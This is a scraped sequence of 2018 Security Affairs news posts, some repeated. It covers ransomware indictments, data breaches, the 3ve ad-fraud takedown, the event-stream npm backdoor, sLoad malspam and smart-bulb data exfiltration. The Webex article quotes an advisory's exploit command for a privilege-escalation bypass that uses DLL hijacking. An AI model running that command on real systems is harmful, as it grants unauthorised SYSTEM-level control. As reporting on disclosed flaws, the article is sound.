In February, SamSam ransomware infected over 2,000 computers at the Colorado Department of Transportation (DOT), the DOT has shut down the infected workstations.

In August, Sophos security firm published a report the SamSam ransomware, its experts tracked Bitcoin addresses managed by the crime gang and discovered that crooks had extorted nearly $6 million from the victims since December 2015 when it appeared in the threat landscape.

“SamSam has earned its creator(s) more than US$5.9 Million since late 2015.
74% of the known victims are based in the United States. Other regions known to have
suffered attacks include Canada, the UK, and the Middle East.” reads the report published by Sophos.

“The largest ransom paid by an individual victim, so far, is valued at US$64,000, a
significantly large amount compared to most ransomware families.”

Sophos tracked the Bitcoin addresses reported in all the SamSam versions it has spotted and discovered that 233 victims paid an overall amount of $5.9 million, the security firm also estimated that the group is netting around $300,000 per month.

Prosecutors reported that Savandi and Mansouri used Iranian Bitcoin exchanges to exchange the cryptocurrency into Iranian rial.

The crooks used the Tor network to avoid being tracked, exports noticed that also encrypted data backups to prevent victims from recovering their encrypted files.

Authorities inserted the two Iranians in the FBI’s Cyber Most Wanted list.

Pierluigi Paganini

(Security Affairs – SamSam ransomware, Iranian hackers)

The post U.S. DoJ charges Iranian duo over SamSam Ransomware activity appeared first on Security Affairs.

Dell data breach – Dell forces password reset after the incident

Dell data breach – IT giant Dell disclosed a data breach, the company confirmed it has detected an intrusion in its systems on November 9th 2018.

Attackers were trying to exfiltrate customer data (i.e. names, email addresses, and hashed passwords) from the company portal Dell.com, from support.dell.com websites.

Wednesday that its online electronics marketplace experienced a “cybersecurity incident” earlier this month when an unknown group of hackers infiltrated its internal network.

As a precautionary measure, Dell forced reset passwords for all accounts on Dell.com website, the company also announced additional measures to mitigate potential effects of the incident.

At the time it is still unclear if hackers succeeded in stealing customer information, the investigation is still ongoing and Dell hasn’t shared any technical details on the intrusion.  Dell hired a digital forensics firm to conduct an investigation and reported the incident to law enforcement.

“On November 9, 2018, Dell detected and disrupted unauthorized activity on our network that attempted to extract Dell.com customer information, limited to names, email addresses and hashed passwords,” read the data breach notification published by Dell.

“Upon detection, we immediately implemented countermeasures and began an investigation. We also retained a digital forensics firm to conduct an independent investigation and engaged law enforcement.”

The tech firm confirmed that payment information and Social Security numbers were not exposed due to the security breach.

“Credit card and other sensitive customer information was not targeted. The incident did not impact any Dell products or services.” continues Dell.

Upon detection of the attempted extraction, Dell immediately implemented countermeasures and initiated an investigation.” 

Customers having a Dell account or that contacted the online support can find more information on a dedicated web page Dell established at www.dell.com/customerupdate.

Customers need to change passwords for any other account on other services if they use the same password for their Dell.com account.

Pierluigi Paganini

(Security Affairs – Dell data breach, hacking)

The post Dell data breach – Dell forces password reset after the incident appeared first on Security Affairs.

AccuDoc Data Breach impacted 2.6 Million Atrium Health patients

Hospital network Atrium Health suffered a data breach, hacked accessed patients’ personal information after compromised the technology solutions provider AccuDoc.

Atrium Health offers healthcare and wellness programs in the Southeast of the United States through more than 40 hospitals and 900 care locations.

AccuDoc is a company providing technology solutions to the healthcare industry, including Hospital network Atrium Health.

Atrium Health was informed on October 1 that AccuDoc had detected unauthorized access to its databases that stored data related to payments made at several company locations, including Blue Ridge HealthCare System, Columbus Regional Health Network, NHRMC Physician Group, Scotland Physicians Network, and St. Luke’s Physician Network.

Hackers accessed to personal information on patients and guarantors (i.e. the individual paying for a patient’s bill), including name, date of birth, address, insurance policy details, medical record number, invoice number, account balance, date of service and, in some cases, social security number. The archive did not contain financial data or clinical/medical information.

The data breach impacted roughly 2.65 million patients, attackers gained access to AccuDoc systems for roughly one week between September 22 and September 29.

“Following an extensive forensics review, it appears that an unauthorized third party gained access to AccuDoc’s databases between September 22, 2018 and September 29, 2018.” reads the data breach notification published by Atrium Health.

“Based on the review, the information that may have been accessed included certain personal information about patients and guarantors (a person who is responsible for paying a patient’s bill), including first and last name, home address, date of birth, insurance policy information, medical record number, invoice number, account balance, and dates of service. For some individuals, the personal information may also have included Social Security numbers.” 

Atrium Health

The company pointed out that no personal information was stolen from AccuDoc’s database and that it is not aware of any misuse.

Atrium Health notified the affected individuals by mail, the company recommends monitoring account statements, bills, notices, and insurance transactions for incidents of unauthorized activity.

Pierluigi Paganini

(Security Affairs – Atrium Health, data breach)

The post AccuDoc Data Breach impacted 2.6 Million Atrium Health patients appeared first on Security Affairs.

Security Affairs: AccuDoc Data Breach impacted 2.6 Million Atrium Health patients

Hospital network Atrium Health suffered a data breach, hacked accessed patients’ personal information after compromised the technology solutions provider AccuDoc.

Atrium Health offers healthcare and wellness programs in the Southeast of the United States through more than 40 hospitals and 900 care locations.

AccuDoc is a company providing technology solutions to the healthcare industry, including Hospital network Atrium Health.

Atrium Health was informed on October 1 that AccuDoc had detected unauthorized access to its databases that stored data related to payments made at several company locations, including Blue Ridge HealthCare System, Columbus Regional Health Network, NHRMC Physician Group, Scotland Physicians Network, and St. Luke’s Physician Network.

Hackers accessed to personal information on patients and guarantors (i.e. the individual paying for a patient’s bill), including name, date of birth, address, insurance policy details, medical record number, invoice number, account balance, date of service and, in some cases, social security number. The archive did not contain financial data or clinical/medical information.

The data breach impacted roughly 2.65 million patients, attackers gained access to AccuDoc systems for roughly one week between September 22 and September 29.

“Following an extensive forensics review, it appears that an unauthorized third party gained access to AccuDoc’s databases between September 22, 2018 and September 29, 2018.” reads the data breach notification published by Atrium Health.

“Based on the review, the information that may have been accessed included certain personal information about patients and guarantors (a person who is responsible for paying a patient’s bill), including first and last name, home address, date of birth, insurance policy information, medical record number, invoice number, account balance, and dates of service. For some individuals, the personal information may also have included Social Security numbers.” 

Atrium Health

The company pointed out that no personal information was stolen from AccuDoc’s database and that it is not aware of any misuse.

Atrium Health notified the affected individuals by mail, the company recommends monitoring account statements, bills, notices, and insurance transactions for incidents of unauthorized activity.

Pierluigi Paganini

(Security Affairs – Atrium Health, data breach)

The post AccuDoc Data Breach impacted 2.6 Million Atrium Health patients appeared first on Security Affairs.



Security Affairs

Security Affairs: FBI along with security firms dismantled 3ve Ad Fraud Operation

FBI along with cybersecurity firms dismantled a sophisticated ad fraud scheme that allowed its operators to earn tens of millions of dollars

Law enforcement and private firms such as Google and WhiteOps took down one of the largest and most sophisticated digital ad-fraud campaign, tracked as Dubbed 3ve, that infected over 1.7 million computers to carry out advertising frauds.

The name 3ve is derived from a set of three distinct sub-operations using unique measures to avoid detection, and each of them was built around different architectures with different components.

3ve has been active since at least 2014 and experts observed a peak in its activity in 2017. It has been estimated that the campaign allowed its operators to earn more than $30 million, people involved in the ad-fraud campaign are all from Eastern Europe.

The United States Department of Justice also issued indicted 8 individuals from Russia, Kazakhstan, and Ukraine.

Operators used a broad range of technique to monetize their efforts, they created fake versions of both websites and used their own botnet to simulate visitors’ activities, then offered ad spaces to advertisers, and Border Gateway Protocol hijacking for traffic redirection. Crooks also used malicious code to generate fake clicks over online ads and earn money.

“3ve operated on a massive scale: at its peak, it controlled over 1 million IPs from both residential botnet infections and corporate IP spaces, primarily in North America and Europe (for comparison, this is more than the number of broadband subscriptions in Ireland). It featured several unique sub-operations, each of which constituted a sophisticated ad fraud scheme in its own right.” read the report published by WhiteOps.

“Tech-savvy fraudsters try to produce fake traffic and fraudulent ad inventory to trick advertisers into believing that their ads are being seen by actual, interested users,” 

The size of the infrastructure involved in the 3ve ad-fraud campaign is very huge, according to the experts fraudsters infected 1.7 million computers with malware, attackers used thousands of servers and more than 10,000 counterfeit websites to impersonate legitimate web publishers.

The experts discovered that crooks used over 60,000 accounts selling ad inventory generating a record of 3 to 12 billion of daily ad bid requests.

“All told, 3ve controlled over 1 million IPs from both residential botnet infections and corporate IP spaces (as noted above, there were up to 700,000 active infections at any given time).” continues the report.

“In aggregate, the operation also produced more than 10,000 counterfeit domains, and generated over 3 billion daily bid requests at its peak. We estimate that portions of the bot operation spanned over 1,000 servers in data centers allocated to various functions needed for this type of large-scale operation”

Experts observed three 3ve operations during their investigation:

3VE.1—The BOAXXE Malware Scheme (aka METHBOT /MIUREF)

So-called 3ve.1 sub-operation leveraged a the Boaxxe botnet, aka Miuref and Methbot, composed of infected systems in data centers across the US and Europe.

Attackers also carried out BGP hijacking to obtain IP addresses used for traffic proxying from the compromised bots the data centers. The infected systems were used to visit both fake and real web pages.

“All the fake ad requests from 3ve.1 initially pretended to be from desktop browsers, but this changed over time, with the operation increasingly relying on spoofed mobile traffic. This was done by the data center-based browsers pretending to be Android devices.” continues the report.

“There were two unique, active mobile misrepresentation schemes: in one the ad requests were spoofed to look like they came from mobile apps, in the other the ad requests were spoofed to look like they came from mobile browsers. The spoofing was achieved by overriding the parameters typically used to determine what type of device the traffic came from”

According to the investigators, between September 2014 and December 2016, the scheme involved over 1,900 servers hosted in commercial data centers to load ads from advertisers on over 5,000 counterfeit websites. With this scheme, fraudsters generated millions of dollars in profit for its operators.

3VE.2—The KOVTER Malware Scheme

In this second scheme, attackers used counterfeit domains to sell fake ad inventory to advertisers. Attaclers used a hidden, custom-built browsing agent (Chromium Embedded Framework) on more than 700,000 computers that were compromised with the Kovter malware.

Fraudsters used redirection servers that instructed the infected computers to visit fake web pages operated by the gang.

3VE.3—Data Centers IPs as Proxies

In the third sub-operation bots were installed in data centers and used the IP addresses of other data centers as proxies.

The 3ve campaign was first spotted in 2016 by ESET that tracked the botnet as Boaxxe botnet.

Security firms helped the FBI to shut down the massive ad-fraud operation. Law enforcement obtained warrants that allowed them to seize 31 internet domains and 89 servers of the 3ve infrastructure.

Pierluigi Paganini

(Security Affairs – 3ve botnet, ad-fraud)

The post FBI along with security firms dismantled 3ve Ad Fraud Operation appeared first on Security Affairs.



Security Affairs

FBI along with security firms dismantled 3ve Ad Fraud Operation

FBI along with cybersecurity firms dismantled a sophisticated ad fraud scheme that allowed its operators to earn tens of millions of dollars

Law enforcement and private firms such as Google and WhiteOps took down one of the largest and most sophisticated digital ad-fraud campaign, tracked as Dubbed 3ve, that infected over 1.7 million computers to carry out advertising frauds.

The name 3ve is derived from a set of three distinct sub-operations using unique measures to avoid detection, and each of them was built around different architectures with different components.

3ve has been active since at least 2014 and experts observed a peak in its activity in 2017. It has been estimated that the campaign allowed its operators to earn more than $30 million, people involved in the ad-fraud campaign are all from Eastern Europe.

The United States Department of Justice also issued indicted 8 individuals from Russia, Kazakhstan, and Ukraine.

Operators used a broad range of technique to monetize their efforts, they created fake versions of both websites and used their own botnet to simulate visitors’ activities, then offered ad spaces to advertisers, and Border Gateway Protocol hijacking for traffic redirection. Crooks also used malicious code to generate fake clicks over online ads and earn money.

“3ve operated on a massive scale: at its peak, it controlled over 1 million IPs from both residential botnet infections and corporate IP spaces, primarily in North America and Europe (for comparison, this is more than the number of broadband subscriptions in Ireland). It featured several unique sub-operations, each of which constituted a sophisticated ad fraud scheme in its own right.” read the report published by WhiteOps.

“Tech-savvy fraudsters try to produce fake traffic and fraudulent ad inventory to trick advertisers into believing that their ads are being seen by actual, interested users,” 

The size of the infrastructure involved in the 3ve ad-fraud campaign is very huge, according to the experts fraudsters infected 1.7 million computers with malware, attackers used thousands of servers and more than 10,000 counterfeit websites to impersonate legitimate web publishers.

The experts discovered that crooks used over 60,000 accounts selling ad inventory generating a record of 3 to 12 billion of daily ad bid requests.

“All told, 3ve controlled over 1 million IPs from both residential botnet infections and corporate IP spaces (as noted above, there were up to 700,000 active infections at any given time).” continues the report.

“In aggregate, the operation also produced more than 10,000 counterfeit domains, and generated over 3 billion daily bid requests at its peak. We estimate that portions of the bot operation spanned over 1,000 servers in data centers allocated to various functions needed for this type of large-scale operation”

Experts observed three 3ve operations during their investigation:

3VE.1—The BOAXXE Malware Scheme (aka METHBOT /MIUREF)

So-called 3ve.1 sub-operation leveraged a the Boaxxe botnet, aka Miuref and Methbot, composed of infected systems in data centers across the US and Europe.

Attackers also carried out BGP hijacking to obtain IP addresses used for traffic proxying from the compromised bots the data centers. The infected systems were used to visit both fake and real web pages.

“All the fake ad requests from 3ve.1 initially pretended to be from desktop browsers, but this changed over time, with the operation increasingly relying on spoofed mobile traffic. This was done by the data center-based browsers pretending to be Android devices.” continues the report.

“There were two unique, active mobile misrepresentation schemes: in one the ad requests were spoofed to look like they came from mobile apps, in the other the ad requests were spoofed to look like they came from mobile browsers. The spoofing was achieved by overriding the parameters typically used to determine what type of device the traffic came from”

According to the investigators, between September 2014 and December 2016, the scheme involved over 1,900 servers hosted in commercial data centers to load ads from advertisers on over 5,000 counterfeit websites. With this scheme, fraudsters generated millions of dollars in profit for its operators.

3VE.2—The KOVTER Malware Scheme

In this second scheme, attackers used counterfeit domains to sell fake ad inventory to advertisers. Attaclers used a hidden, custom-built browsing agent (Chromium Embedded Framework) on more than 700,000 computers that were compromised with the Kovter malware.

Fraudsters used redirection servers that instructed the infected computers to visit fake web pages operated by the gang.

3VE.3—Data Centers IPs as Proxies

In the third sub-operation bots were installed in data centers and used the IP addresses of other data centers as proxies.

The 3ve campaign was first spotted in 2016 by ESET that tracked the botnet as Boaxxe botnet.

Security firms helped the FBI to shut down the massive ad-fraud operation. Law enforcement obtained warrants that allowed them to seize 31 internet domains and 89 servers of the 3ve infrastructure.

Pierluigi Paganini

(Security Affairs – 3ve botnet, ad-fraud)

The post FBI along with security firms dismantled 3ve Ad Fraud Operation appeared first on Security Affairs.

British MP: Facebook was aware about Russian activity at least since 2014

A British MP claims Facebook was ware about Russian political interference in 2014, long before the events become public.

The British MP Damian Collins, head of a parliamentary inquiry into disinformation, revealed that one of the emails seized from US software company Six4Three as part of a US lawsuit, demonstrates that a Facebook engineer had notified the social network giant in October 2014 that Russian IP addresses were accessing “three billion data points a day” on the network.

“British MPs joined together with fellow lawmakers from the parliaments of Argentina, Brazil, Canada, France, Ireland, Latvia and Singapore in an unusual move aimed at emphasising international solidarity on the issue.reported AFP press.

The information was shared during an international hearing that parliament hosted on Tuesday to gather info into disinformation and “fake news.”

The emails confirmed that Facebook was aware of the activities carried out by Russian threat actors in 2014 when they accessed a huge amount of data from the social media company.

“If Russian IP addresses were pulling down a huge amount of data from the platform was that reported or was that just kept, as so often seems to be the case, within the family and not talked about,” Collins asked Richard Allan, Facebook’s Vice President of Policy Solutions.

Richard Allan, Facebook’s Vice President of Policy Solutions, that represents the company replied that information could be used to provide a distorted interpretation of events.

“Any information you have seen… is at best partial and at worst potentially misleading” replied Allan. The emails were “unverified partial accounts”.

Allan also defended Facebook CEO Mark Zuckerberg, who has refused to appear before the British parliamentary inquiry.

Since the disclosure of the Cambridge Analytica privacy scandal and the alleged interference in the 2016 Presidential election, Facebook data protection policies were questioned by intelligence analysts and privacy advocates.

“While we were playing with our phones and apps, our democratic institutions… seem to have been upended by fratboy billionaires in California”. Charlie Angus from Canada’s House of Commons told Allan.

Catherine Morin-Desailly from the French Senate classified the Facebook data protection approach as “a scandal”, other lawmakers condemned the way Facebook shared user data with third-party companies.

Pierluigi Paganini

(Security Affairs – Facebook, fake news)

The post British MP: Facebook was aware about Russian activity at least since 2014 appeared first on Security Affairs.

Initial patch for Webex Meetings flaw WebExec was incomplete. Cisco fixed it again

Cisco has released a new round of security patches to address potentially serious WebExec Webex flaw first addressed one month ago.

One month ago, Cisco addressed the CVE-2018-15442 vulnerability, also tracked as WebExec by Counter Hack researchers Ron Bowes and Jeff McJunkin who discovered it.

The flaw affects Cisco Webex Meetings Desktop and has been rated as a “high” severity command injection vulnerability.

The CVE-2018-15442 vulnerability could be exploited by an authenticated, local attacker to execute arbitrary commands as a privileged user.

“The vulnerability is due to insufficient validation of user-supplied parameters. An attacker could exploit this vulnerability by invoking the update service command with a crafted argument. An exploit could allow the attacker to run arbitrary commands with SYSTEM user privileges.” states the advisory published by Cisco.

“While the CVSS Attack Vector metric denotes the requirement for an attacker to have local access, administrators should be aware that in Active Directory deployments, the vulnerability could be exploited remotely by leveraging the operating system remote management tools.”

Cisco advisory reveals that the vulnerability could be also exploited remotely by leveraging the operating system remote management tools.

The issue could be exploited by a malware or ill-intentioned logged-in user to gain system administrator rights and carry out malicious activities.

The CVE-2018-15442 flaw affects all Cisco Webex Meetings Desktop App releases prior to 33.6.0, and Cisco Webex Productivity Tools Releases 32.6.0 and later prior to 33.0.5, when running on a Microsoft Windows end-user system.

cisco webex WebExec 

The flaw was discovered 0n July 24, 2018, and it was reported to Cisco on August 6, 2018. On October 24, 2018, the company released the advisory.

A few days after the disclosure of the flaw, researchers at SecureAuth discovered that official patch released by Cisco was incomplete. The experts discovered that it is possible to bypass the fix using the DLL hijacking.

“The vulnerability can be exploited by copying to an a local attacker controller folder, the ptUpdate.exe binary. Also, a malicious dll must be placed in the same folder, named wbxtrace.dll,” reads the advisory published by SecureAuth

“To gain privileges, the attacker must start the service with the command line: sc start webexservice install software-update 1 ‘attacker-controlled-path’ (if the parameter 1 doesn’t work, then 2 should be used).”

SecureAuth reported its findings to Cisco on November 9 and the company released a new set of patches on Tuesday.

Cisco published an update for the initial advisory informing users of the SecureAuth’s findings.

“After an additional attack method was reported to Cisco, the previous fix for this vulnerability was determined to be insufficient. A new fix was developed, and the advisory was updated on November 27, 2018, to reflect which software releases include the complete fix,” Cisco wrote.

Pierluigi Paganini

(Security Affairs – Cisco Webex, WebExec)

The post Initial patch for Webex Meetings flaw WebExec was incomplete. Cisco fixed it again appeared first on Security Affairs.

Uber fined nearly $1.2 Million by Dutch and UK Data Protection Authorities over data breach

British and Dutch data protection regulators fined the ride-sharing company Uber with $1,170,892 for the 2016 data breach.

British and Dutch data protection regulators have fined Uber with $1,170,892 for the 2016 security breach that exposed personal data of 57 million of its users.

In November 2017, the Uber CEO Dara Khosrowshahi announced that hackers broke into the company database and accessed the personal data (names, email addresses and cellphone numbers) of 57 million of its users, the disconcerting revelation was that the company covered up the hack for more than a year.

The attackers accessed also the names and driver’s license numbers of roughly 600,000 of its drivers in the United States.

The hack happened in 2016, it was easy for hackers that according to a report published by Bloomberg, obtained credentials from a private GitHub site used by the company development team. The hackers tried to blackmail Uber and demanded $100,000 from the company in exchange for avoiding publish the stolen data.

Rather than to notify the data breach to customers and law enforcement as is required by California’s data security breach notification law, the chief of information security Joe Sullivan ordered to pay the ransom and to cover the story destroying any evidence. The payout was disguised as a bug bounty prize complete with non-disclosure agreements signed.

Now Britain’s Information Commissioner’s Office (ICO) fined Uber 385,000 pounds ($491,102) for failing to protect the personal information of 3 million Britons.

“The Information Commissioner’s Office (ICO) has fined ride sharing company Uber £385,000 for failing to protect customers’ personal information during a cyber attack.

A series of avoidable data security flaws allowed the personal details of around 2.7million UK customers to be accessed and downloaded by attackers from a cloud-based storage system operated by Uber’s US parent company. This included full names, email addresses and phone numbers.” states the ICO.

“The records of almost 82,000 drivers based in the UK – which included details of journeys made and how much they were paid – were also taken during the incident in October and November 2016.”

ICO Director of Investigations Steve Eckersley declared:

“This was not only a serious failure of data security on Uber’s part, but a complete disregard for the customers and drivers whose personal information was stolen. At the time, no steps were taken to inform anyone affected by the breach, or to offer help and support. That left them vulnerable.”

“Paying the attackers and then keeping quiet about it afterwards was not, in our view, an appropriate response to the cyber attack.”

“Although there was no legal duty to report data breaches under the old legislation, Uber’s poor data protection practices and subsequent decisions and conduct were likely to have compounded the distress of those affected.”

The UK ICO confirmed that none of the affected customers were notified of the security breach.

The Dutch Data Protection Authority (Dutch DPA) fined the company 600,000 euro ($679,790)  for failing to protect the personal information of 174,000 Dutch citizens.

“The Dutch Data Protection Authority (Dutch DPA) imposes a fine of €600.000 upon Uber B.V. and Uber Technologies, Inc (UTI) for violating the Dutch data breach regulation. ” states the Dutch DPA.

“This data breach has affected 57 million Uber users worldwide, and concerns 174.000 Dutch citizens. Amongst the data were names, e-mail addresses and telephone numbers of customers and drivers.”

In an official statement, Uber announced that it is “pleased to close this chapter on the data incident from 2016.”

The company highlighted that it has introduced a number of technical improvements since the data breach.

“We learn from our mistakes,” the company said.

Pierluigi Paganini

(Security Affairs – data protection, UK Parliament)

The post Uber fined nearly $1.2 Million by Dutch and UK Data Protection Authorities over data breach appeared first on Security Affairs.

Malicious developer distributed tainted version of Event-Stream NodeJS Module to steal Bitcoins

Hacker compromised third-party NodeJS module “Event-Stream” introducing a malicious code aimed at stealing funds in Bitcoin wallet apps.

The malicious code was introduced in the version 3.3.6, published on September 9 via the  Node Package Manager (NPM) repository.

The Event-Stream library is a very popular NodeJS module used to allow developers the management of data streams, it has nearly 2 million downloads a week.

It has been estimated that the tainted version of the library was downloaded by nearly 8 million developers.

The library was created by Dominic Tarr, who maintained it for a long time, but when he left the project allowed an unknown programmer, called “right9ctrl” to continue its work.

“he emailed me and said he wanted to maintain the module, so I gave it to him. I don’t get any thing from maintaining this module, and I don’t even use it anymore, and havn’t for years.” wrote Tarr.

Tarr trusted right9ctrl  because of his important contributions to the project, but the expert once gained the access to the library, released a new version released Event-Stream version 3.3.6, containing a new library, called Flatmap-Stream, as a dependency, which was specifically designed to implement the malicious feature.

The bad news is that the code remained undetected for more than 2 months because it was encrypted. The malicious code spotted by a computer science student at California State University, Ayrton Sparling (FallingSnow handle on gitHub), who reported it.

“If you are using anything crypto-currency related, then maybe. As discovered by @maths22, the target seems to have been identified as copay related libraries. It only executes successfully when a matching package is in use (assumed to be copay at this point).” reported Sparling  on GitHub

“If you are using a crypto-currency related library and if you see flatmap-stream@0.1.1 after running npm ls event-stream flatmap-stream, you are most likely affected.

For example:

$ npm ls event-stream flatmap-stream

flatmap-stream@0.1.1″

The manager of the NPM repository who analyzed the malicious code discovered that it was designed to target people using the open-source bitcoin wallet app BitPay, distribution of the Copay project, that leverages the event-stream.

A security advisory published by BitPay confirms that Copay versions 5.0.2 through 5.1.0 were affected by the malicious code, the organization released the Copay version 5.2.0 to address the issue.

“We have learned from a Copay GitHub issue report that a third-party NodeJS package used by the Copay and BitPay apps had been modified to load malicious code which could be used to capture users’ private keys. Currently we have only confirmed that the malicious code was deployed on versions 5.0.2 through 5.1.0 of our Copay and BitPay apps. However, the BitPay app was not vulnerable to the malicious code. We are still investigating whether this code vulnerability was ever exploited against Copay users.” BitPay says in the advisory.

“Users should assume that private keys on affected wallets may have been compromised, so they should move funds to new wallets (v5.2.0) immediately.Users should not attempt to move funds to new wallets by importing affected wallets’ twelve word backup phrases (which correspond to potentially compromised private keys). Users should first update their affected wallets (5.0.2-5.1.0) and then send all funds from affected wallets to a brand new wallet on version 5.2.0, using the Send Max feature to initiate transactions of all funds.”

The malicious code allows the attackers to steal digital coins stored in the Dash Copay Bitcoin wallets and transfer them to a server located in Kuala Lumpur, Malaysia.

On Monday, NPM maintainers removed the backdoor from the repository.

Pierluigi Paganini

(Security Affairs – Daniel’s Hosting, dark web)

The post Malicious developer distributed tainted version of Event-Stream NodeJS Module to steal Bitcoins appeared first on Security Affairs.

The SLoad Powershell malspam is expanding to Italy

A new malspam campaign hit Italy in this days, threat actors are spreading a new variant of a powerful downloader named sLoad.

sLoad is a sophisticated script, used in the past to deliver different types of malware such as the dreaded “Ramnit banker”.

“In the past months CERT-Yoroi observed an emerging attack pattern targeting its constituency. These series of malicious email messages shared common techniques may be likely related to a single threat group starting its operation against the Italian cyber panorama.” reads the analysis published by Yoroi.

“It is still not clear if these attack attempts may be originated by a any well established cybercrime group modifying its TTP or a completely new one, however CERT-Yoroi is tracking this threat with the internal codename “Sload-ITA” (TH-163) .”

sLoad implements a broad range of capabilities including the ability to take screenshots, read the list of running process, exfiltrate DNS cache, exfiltrate outlook e-mail and other typical spyware functionalities.

As usual, it comes as a zip file attached to an e-mail, this file contains two elements:

  1. A fake shortcut to directory (.lnk file);
  2. Legitimate image flagged as hidden.

It is strange that the image is not used into the malware’s workflow, but the link file starts a complex infection chain, as shown in the following figure:

sLoad

First of all, the .lnk file runs a first PowerShell activator, which searches a file named: “documento-aggiornato-novembre-*.zip”.

Then, if the .zip file exists, the PowerShell script extracts and runs a portion of a code present at the end of the same file. Once the PowerShell script has been extracted, it runs another Powershell script that acts as a subsequent dropper in the attack chain.

This ps code abuses the BitsTransfer windows functionality to download two important files: config.ini and web.ini that contains the final sLoad stage.

The malicious code gains persistence using a task defined into System Task Scheduler that runs a Visual Basic script.

At the end, when sLoad is started, it periodically takes screenshots, gathers system’s information and sends other data to the C2 .

Technical details, including IoCs and Yara Rules, about the sLoad malware are available on the Yoroi blog.

The SLoad Powershell Threat is Expanding to Italy

Pierluigi Paganini

(Security Affairs – malspam, malware)

The post The SLoad Powershell malspam is expanding to Italy appeared first on Security Affairs.

Experts demonstrate how to exfiltrate data using smart bulbs

Security researchers with Checkmarx developed two mobile applications that abuse the functionality of smart bulbs for data exfiltration.

Security researchers with Checkmarx developed two mobile applications that exploit smart bulbs features for data exfiltration.

The experts used the Magic Blue smart bulbs that implement communication through Bluetooth 4.0. The devices are manufactured by the Chinese company called Zengge and could be controlled using both Android and iOS apps.

The company supplies major brands like Philips and Osram etc.

The experts focused their study on devices using the Low Energy Attribute Protocol (ATT) to communicate.

The first test made by the experts consisted of sniffing communication between the smart bulbs and the paired Mobile Application. The pairing method used by the researcher is Just Works.

The experts paired the Android mobile phone with the iLight app and started sniffing the traffic while changing the colors of the smart bulbs.

In this way, the researchers discovered the commands sent by the mobile app to the smart bulbs. The team made a reverse engineering of the Mobile Application using the jadx tool.

 smart bulbs analysis

Once gained the complete control of the bulbs, experts started working on an application that leverages the light of the bulbs to transfer information from a compromised device to the attacker.

“The main plan for exfiltration was to use light as a channel to transfer information from a compromised device to the attacker. Light can achieve longer distances, which was our goal.” reads the analysis published by the experts.

“Imagine the following attack scenario: a BLE device (smartphone) gets compromised with malware. The malware steals the user’s credentials. The stolen information is sent to an attacker using a BLE light bulb nearby.”

smart bulbs analysis 2

Checkmark experts used a smartphone connected to a telescope to receive the exfiltrated data without raising suspicion.

The researchers created two applications for the data exfiltration, one installed on the victim’s mobile device and the other users on the attacker’s mobile device to receive and interpret the data.

The application installed on the victim’s device modulates the light intensity to transfer data, it runs in either Normal or Stealth mode. The Stealth mode is hard to detect to the victim’s eye because it uses the shades of blue.

“We created two apps, the first app for sending the exfiltrated data and a second one for receiving it. The app that transmits the information changes the blue light intensity – weaker for binary 1 and stronger for binary 0. The app has two options: Normal mode and Stealth mode. The first one may be visible to human-eye and the stealth mode is very hard to detect because of the variations of shades of blue used.” continues the experts.

Below a video PoC created by the experts.

“These methods will work on every smart bulb that allows control by an attacker. In the future, we would like to create a better proof of concept that allows us to test a database of vulnerable bulbs and even implement AI to learn and implement new bulbs along the way,” Checkmarx concludes.

Pierluigi Paganini

(Security Affairs – data exfiltration, smart bulbs)

The post Experts demonstrate how to exfiltrate data using smart bulbs appeared first on Security Affairs.

Security Affairs: UK Parliament seized confidential Facebook docs to investigate its data protection policies.

UK Parliament Seizes seized confidential Facebook documents from the developer of a now-defunct bikini photo searching app to investigate its data protection policies.

A British lawmaker obliged a visiting tech executive to share the files ahead of an international hearing that parliament is hosting on Tuesday to gather info into disinformation and “fake news.”

Committee Chairman Damian Collins obtained and reviewed the documents the parliament’s Digital, Culture, Media and Sport Committee has received from the app maker Six4Three relating to Facebook.

“Under UK law & parliamentary privilege we can publish papers if we choose to as part of our inquiry.”

Six4Three acquired the files, related to a period between 2013 and 2014, as part of a U.S. lawsuit against Facebook.

The authorities are investigating the Facebook’s privacy policies in 2015 that led Six4Three to shut down its app, Pikinis. Pikinis was an app that allowed users to find photos of their friends in bikinis and bathing suits by searching their friends list.

Collins aims at demonstrating how Facebook abuses could result in misinformation campaigns and interfering with political elections.

Facebook executive, Richard Allan, will have to respond to the answers of lawmakers from seven countries at the committee’s hearing in London next Tuesday.

Lawmakers from seven countries are preparing to grill a Facebook executive, Richard Allan, at the committee’s hearing in London. Facebook CEO Mark Zuckerberg has refused to be present.

“The U.K. committee used its powers to compel the chief executive Six4Three, Theodore Kramer, who was on a business trip to London, to turn over the files, according to parliamentary records and news reports.” reported the AP agency.

“The committee twice requested that Kramer turn over the documents. When he failed to do so, Kramer was escorted to parliament and told he risked imprisonment if he didn’t hand them over, the Observer newspaper reported.”

The company is opposing to the disclosure of the files, a judge in California ordered them sealed earlier this year.

Allan informed Collins via email the judge is expected to give guidance on the legal status of the documents as early as Monday,

“Six4Three’s claims are entirely meritless,” Facebook said in a statement.

Last week, Facebook announced it will appeal the fine for failing to protect the privacy of the users in the Cambridge Analytica scandal. Political consultancy firm Cambridge Analytica improperly collected data of 87 million Facebook users and misused it.

Facebook has been fined £500,000 in the U.K., the maximum fine allowed by the UK’s Data Protection Act 1998, for failing to protect users’ personal information.

Facebook- Cambridge Analytica

The social network giant is sustaining that U.K regulators failed to prove that British users were directly affected.

Britain’s Information Commissioner Office also found that the company failed to be transparent about how people’s data was harvested by others.

According to the ICO,  even after the misuse of the data was discovered in December 2015, the company did not do enough to ensure those who continued to hold it had taken adequate and timely remedial action, including deletion. Other companies continued to access Facebook users’data such as the SCL Group, that was able to access the platform until 2018.

Facebook considers the fine as unacceptable because there are many practices online that are commonly accepted even if they threaten the privacy of the users.

Pierluigi Paganini

(Security Affairs – data protection, UK Parliament)

The post UK Parliament seized confidential Facebook docs to investigate its data protection policies. appeared first on Security Affairs.



Security Affairs

UK Parliament seized confidential Facebook docs to investigate its data protection policies.

UK Parliament Seizes seized confidential Facebook documents from the developer of a now-defunct bikini photo searching app to investigate its data protection policies.

A British lawmaker obliged a visiting tech executive to share the files ahead of an international hearing that parliament is hosting on Tuesday to gather info into disinformation and “fake news.”

Committee Chairman Damian Collins obtained and reviewed the documents the parliament’s Digital, Culture, Media and Sport Committee has received from the app maker Six4Three relating to Facebook.

“Under UK law & parliamentary privilege we can publish papers if we choose to as part of our inquiry.”

Six4Three acquired the files, related to a period between 2013 and 2014, as part of a U.S. lawsuit against Facebook.

The authorities are investigating the Facebook’s privacy policies in 2015 that led Six4Three to shut down its app, Pikinis. Pikinis was an app that allowed users to find photos of their friends in bikinis and bathing suits by searching their friends list.

Collins aims at demonstrating how Facebook abuses could result in misinformation campaigns and interfering with political elections.

